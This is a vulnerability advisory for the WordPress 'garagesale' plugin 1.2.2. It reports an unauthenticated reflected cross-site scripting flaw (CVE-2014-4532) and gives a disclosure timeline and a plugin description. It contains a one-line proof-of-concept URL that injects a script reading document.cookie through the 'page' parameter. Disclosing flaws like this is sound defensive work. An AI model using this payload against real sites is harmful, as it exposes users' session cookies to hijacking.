wp-plugin : garagesale

Plugin Details
Plugin Name: wp-plugin : garagesale
Effected Version : 1.2.2 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

http://localhost/wordpress/wp-content/wp-plugs/garagesale/templates/printAdminUsersList_Footer.tpl.php?page=page%22%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&


Disclosure Timeline
Vendor Contacted : 2014-01-21
Plugin Status : Updated on 2014-01-11
Public Disclosure : May 25, 2014
CVE Number : CVE-2014-4532
Plugin Description :
[| This plugin is a lightweight solution to put a kind of garage sale on your wordpress page. Users can put their stuff with a picture, description, price and contact on a wordpress site. The users are wordpress users with access right Subscriber (so every registered user can use the garage sale). Put the string "[GarageSaleList]" on any page or article post where you want to display the list of sale items. This Plugin creates an own subfolder within the upload folder for the pictures. look at http://www.eibler.at/garagesale/ for detailled description of usage and installation ]